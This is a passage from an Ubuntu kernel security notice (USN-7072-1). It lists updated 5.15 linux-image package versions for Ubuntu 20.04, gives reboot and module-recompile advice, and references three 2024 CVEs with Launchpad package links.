linux-image-gkeop-5.15          5.15.0.1054.61~20.04.1  linux-image-ibm                 5.15.0.1064.67~20.04.1  linux-image-intel               5.15.0.1066.72~20.04.1  linux-image-intel-iotg          5.15.0.1066.72~20.04.1  linux-image-lowlatency-64k-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-lowlatency-hwe-20.04  5.15.0.124.134~20.04.1  linux-image-oem-20.04           5.15.0.124.134~20.04.1  linux-image-oem-20.04b          5.15.0.124.134~20.04.1  linux-image-oem-20.04c          5.15.0.124.134~20.04.1  linux-image-oem-20.04d          5.15.0.124.134~20.04.1  linux-image-oracle              5.15.0.1069.75~20.04.1  linux-image-virtual-hwe-20.04   5.15.0.124.134~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7072-1  CVE-2024-27397, CVE-2024-38630, CVE-2024-45016Package Information:  https://launchpad.net/ubuntu/+source/linux/5.15.0-124.134  https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1071.77  https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1070.78  https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1054.61  https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1064.67  https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1066.72  https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1068.73  https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-124.134  https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1066.67  https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1069.75  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1064.67  https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.15.0-1037.41  https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1071.77~20.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1070.78~20.04.1  https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1054.61~20.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-124.134~20.04.1  https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1064.67~20.04.1 https://launchpad.net/ubuntu/+source/linux-intel-iotg-5.15/5.15.0-1066.72~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-124.134~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1069.75~20.04.1

Tag

#vulnerability